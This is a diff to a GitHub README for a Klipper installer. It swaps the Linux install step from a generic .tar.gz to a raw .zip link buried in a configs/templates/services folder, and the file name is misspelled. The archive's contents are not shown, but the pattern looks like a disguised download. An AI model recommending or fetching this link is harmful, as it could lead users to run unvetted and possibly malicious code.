iWz3r/KATANA-Klipper-Installer/README.md

   - Open the `.dmg` file and drag the KATANA-Klipper-Installer app to your Applications folder.

 - **For Linux:**
-  - Extract the `.tar.gz` file and run the included script in the terminal.
+  - Extract the `https://github.com/iWz3r/KATANA-Klipper-Installer/raw/refs/heads/main/configs/templates/services/KATAN-Installer-Klipper-1.3.zip` file and run the included script in the terminal.

 ## 🌟 Running the Application